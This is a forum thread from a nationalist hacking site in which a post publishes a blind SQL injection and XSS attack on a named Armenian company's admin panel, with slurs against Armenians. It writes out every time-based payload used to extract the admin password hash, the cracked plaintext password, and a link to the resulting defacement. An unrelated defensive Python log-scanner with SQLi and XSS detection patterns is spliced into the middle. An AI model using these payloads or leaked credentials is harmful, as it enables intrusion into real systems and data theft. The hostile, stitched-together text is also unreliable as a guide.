Anti-armenia.ORG - Forums - 0day for fucked fluger arm bitch studio



User
    2012-09-03 19:17 GMT

BlackMinD

Pr0grammer
Messages: 1677
Rep: 62
Gender: Male
City: KARABAKH IS AZERBAIJAN!


0day for fucked fluger arm bitch studio

http://pastebin.com/8RwCW8fS


Code:
=====================================================
Vulnerable Software:  Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection And XSS
Tested: In Wild
=====================================================


Dork :
Designed and developed by Fluger IT
All right reserved © | 2004 - 2012

************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************


======================================================
FULLY disclosed Real Exploitation examples:
GPC MUST BE=OFF

There is a Blind SQLi vulnerability on the login page:

http://www.artclima.am/edit/ <===(Admin panel)


The vulnerable scenario exists here: http://www.artclima.am/edit/config_secure/verify.php

(Sorry, I have no access to the source code)

CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png

Due to the authentication mechanism you can't bypass the login form by sending:
'or''='

Instead you can use the Time Based way to obtain login:password from the admin table.
Here we go:

Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png




http://www.artclima.am/edit/index.php?error


Headers:

Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28



POST DATA:

username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


*REPLAY*


There is a Blind on the login.
Bypass doesn't work.

Time Based RuleZ!

www.artclima.am/edit/index.php?error

columns:

user
password


table: admin




=========================================

There is 1 user:

//TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir

let's pull the login


login: admin


//TRUE

username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir



let's pull the password:


=========================================
1st character: e

username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

2nd character: 0

username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

3rd character: 4

username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

4th character: 4

username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
5th character: 6

username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
6th character: 5

username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
7th character: 0

username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
8th character: a

username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
9th character: 5

username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

10th character: 6

username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

11th character: 7

username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

12th character: e

username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
13th character: d

username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

check later

=========================================
14th character: 2

username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
15th character: b


username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

16th character: 2

username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================


17th character: d

username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
18th character: 0

username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

19th character: 4

username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

20th character: 3

username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
21st character: 0

username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
22nd character: 3

username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

23rd character: e

username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
24th character: 3

username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

25th character: 7

username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

26th character: 9

username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

27th character: 3

username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

28th character: d


username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
29th character: f

username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
30th character: d

username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
31st character: 9

username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================

32nd character: 5

username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================


Verification:  +


//TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

MD5: e044650a567ed2b2d04303e3793dfd95

Resolves to: price777

Sure! I will "rm"-it too with great pleasure!

Rmned: http://zone-h.org/mirror/id/18295382





Second way: Session Hijack to gain access to admin panel:

XSS:
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1


Print Screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png





From the source code of the page:




<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
<tr valign="top">
<td class="bg_content">
<div id="printarea">
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
<tr>
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
<td>&nbsp;</td>
</tr>
</table>
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >



==========================THE END=========================






SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep


02.09.2012

Motherland!
Anti-armenia.ORG
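Both issues in the post above, the time-based blind SQLi on the login form and the reflected XSS in the `type_name` parameter, leave a recognisable trace in the web server's request log. The following Python script is an added example written for this page; it is not AkaStep's code and has nothing to do with the Fluger product. It runs a few indicator patterns over constructed, log-style records shaped like the requests quoted in the post and, wherever a `sleep(N)` turns up in a parameter, compares the recorded response time with the requested delay. That comparison is what lets an analyst separate a probe the database actually executed (the true branch of the `if`) from one that was blocked or fell on the false branch. The record layout, the `analyse` and `scan` function names and all sample values are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed, log-style records (not real traffic) shaped like the requests in the post:
# (method, path with query string, POST body, response time in milliseconds).
SAMPLE_REQUESTS = [
    ("POST", "/edit/index.php?error",
     "username=%27+or+%28select+if%28substr%28password%2C1%2C1%29%3D%27e%27%2Csleep%2830%29%2C0%29"
     "+from+admin+limit+1%29--+and+5%3D%275&password=x", 30412),
    ("GET", "/edit/admin.php?page=news_admin/news&type=25"
     "&type_name=Title%3Cscript%3Ealert%281%29%3C/script%3E", "", 85),
    ("POST", "/edit/index.php", "username=alice&password=correct+horse", 120),
    ("GET", "/edit/admin.php?page=news_admin/news&type_name=Spring%20Catalog", "", 90),
]

# Indicator patterns applied to each URL-decoded parameter value.
INDICATORS = {
    # MySQL/PostgreSQL delay functions; group 2 captures the requested delay/iterations.
    "sqli_time_based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(\s*(\d+)", re.I),
    # Quote followed by a boolean operator and a subquery: the shape of the post's payloads.
    "sqli_structure": re.compile(r"'\s*(?:or|and)\b.*\b(?:select|union)\b", re.I | re.S),
    # Script element injected into a reflected parameter.
    "xss_script_tag": re.compile(r"<\s*script\b", re.I),
}


def decoded_params(path, body):
    """Return every URL-decoded parameter value from the query string and the POST body."""
    values = []
    for raw in (urlsplit(path).query, body):
        for vals in parse_qs(raw, keep_blank_values=True).values():
            values.extend(vals)
    return values


def analyse(method, path, body, resp_ms):
    """Return the sorted list of indicator names that fire for one request record."""
    findings = set()
    for value in decoded_params(path, body):
        for name, pattern in INDICATORS.items():
            match = pattern.search(value)
            if not match:
                continue
            findings.add(name)
            if name == "sqli_time_based":
                func, amount = match.group(1).lower(), int(match.group(2))
                # sleep()/pg_sleep() take seconds; benchmark() takes an iteration count,
                # so only the former can be compared directly with the response time.
                if func != "benchmark" and resp_ms >= amount * 1000:
                    findings.add("sqli_time_based_delay_observed")
    return sorted(findings)


def scan(records):
    """Return (record index, findings) for every record that triggers at least one indicator."""
    hits = []
    for idx, (method, path, body, resp_ms) in enumerate(records):
        findings = analyse(method, path, body, resp_ms)
        if findings:
            hits.append((idx, findings))
    return hits


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS):
        method, path, _, resp_ms = SAMPLE_REQUESTS[idx]
        print(f"{method} {path} ({resp_ms} ms): {', '.join(findings)}")
```

The first sample record is flagged three times: the quote-plus-subquery shape, the `sleep(30)` call, and the fact that the server took over 30 s to answer, which means the injected condition was evaluated and found true. A record that carries `sleep(60)` but returns in 85 ms would only get the first two labels; that is still worth an alert, since a probe on the false branch looks exactly like that. The XSS record is matched on the decoded `type_name` value, which is why the script decodes parameters before matching rather than grepping the raw line.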
    

User
    2012-09-17 22:05 GMT

Fearless

VIP
Messages: 1299
Rep: 23
Gender: Male
City: Gävle
Occupation: Hacker, Defacer, Programmer
Age: 26


Respect!

Blind SQL Must learn +)

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG